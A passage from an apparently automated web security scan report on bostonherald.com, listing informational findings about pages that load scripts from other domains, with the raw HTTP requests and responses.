Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:58:19 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 2589
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<!-- This Page is for Inclusion i
...[SNIP]...
<div id="stage">


        <script type="text/javascript" src="http://objects.tremormedia.com/embed/js/embed.js"></script>
<script type="text/javascript" src="http://objects.tremormedia.com/embed/js/4c6ebfbed6269_p.js"></script>
...[SNIP]...

7.14. http://www.bostonherald.com/mediacenter/video.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /mediacenter/video.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /mediacenter/video.php?src=http://multimedia.bostonherald.com/video/20110127/012711snowar.flv&program_id=4c6ebfbed6269&media_id=2024&title=Sidewalk%20snow%20woes&width=370&height=300&bc_id=766783859001&rand=408 HTTP/1.1
Host: www.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:57:28 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Length: 2489
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<!-- This Page is for Inclusion i
...[SNIP]...
</div>

<script type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...

7.15. http://www.bostonherald.com/news/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /news/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains: